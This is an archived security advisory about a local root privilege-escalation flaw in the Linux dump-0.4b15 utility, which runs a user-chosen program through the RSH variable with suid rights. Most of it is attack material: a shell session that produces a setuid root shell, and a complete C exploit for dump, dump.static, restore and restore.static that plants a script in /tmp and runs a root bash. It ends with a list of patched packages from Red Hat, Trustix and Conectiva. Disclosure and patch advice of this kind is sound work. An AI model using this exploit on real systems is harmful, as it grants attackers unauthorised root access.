Vulnerability
dump
Affected
dump-0.4b15
Description
Mat found following. Linux dump command executes external program
with suid priviledge. Example:
[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
This is quick and dirty exploit:
/*
**
** dump-0.4b15x.c
**
** dump-0.4b15 exploit:
** Redhat 6.2 dump command executes
** external program with suid priviledge.
**
** affected:
** /sbin/dump
** /sbin/dump.static
** /sbin/restore
** /sbin/restore.static
**
** Bug found by mat@hacksware.com
**
** This example was coded by md0claes@mdstud.chalmers.se
** It was written for EDUCATIONAL PURPOSES ONLY.
**
**
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define RUNME "/tmp/runme" /* tmp file */
#define SUID_PATH "/tmp/superdude" /* the power of root */
void usage(char *pname)
{
fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname);
fprintf(stdout, " d - exploit /sbin/dump\n");
fprintf(stdout, " s - exploit /sbin/dump.static\n");
fprintf(stdout, " r - exploit /sbin/restore\n");
fprintf(stdout, " p - exploit /sbin/restore.static\n\n");
}
int main(int argc, char *argv[], char *envp[])
{
int fd;
pid_t pid;
char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME };
char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash "
SUID_PATH "\nchmod 6755 " SUID_PATH };
char *suid[] = { SUID_PATH, NULL };
char *av[] = { "/sbin/restore.static", "restore.static",
"-t", "/tmp/foo" };
if (argc != 2) {
usage(argv[0]);
exit(1);
}
switch(tolower(argv[1][0])) {
case 'd':
av[0] = "/sbin/dump";
av[1] = "dump";
av[2] = "-0";
av[3] = "/";
break;
case 's':
av[0] = "/sbin/dump.static";
av[1] = "dump.static";
av[2] = "-0";
av[3] = "/";
break;
case 'r':
av[0] = "/sbin/restore";
av[1] = "restore";
break;
case 'p':
break;
default:
usage(argv[0]);
exit(1);
}
if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) {
perror("fopen");
exit(1);
}
if (write(fd, runbuf, sizeof(runbuf)) == -1) {
perror("write");
exit(1);
}
close(fd);
if ((pid = fork()) < 0) {
perror("fork");
exit(1);
}
else if (pid == 0) {
if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) {
perror("execle");
_exit(1);
}
}
sleep(1);
unlink(RUNME);
fprintf(stdout, "\nExploited %s \n", av[0]);
fprintf(stdout, "Running " SUID_PATH "\n");
execve(SUID_PATH, suid, envp);
exit(0);
}
Solution
This is the location for the latest version
ftp://ftp.sourceforge.net/pub/sourceforge/dump/
dump is no longer suid root.
For RedHat:
ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm
ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm
ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm
ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm
ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm
ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm
ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm
ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm
All released versions of Trustix Secure Linux contain a version
of dump that is known to have a local root exploit. People with
untrusted local users should upgrade as soon as possible. Get the
packages at:
ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/
http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
dump-0.4b19-2tr.i586.rpm
rmt-0.4b19-2tr.i586.rpm
Conectiva last mandatory update of the dump package brought it up
to version 0.4b18 and had the SUID bits disabled. These packages
do not have the vulnerability discussed above.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
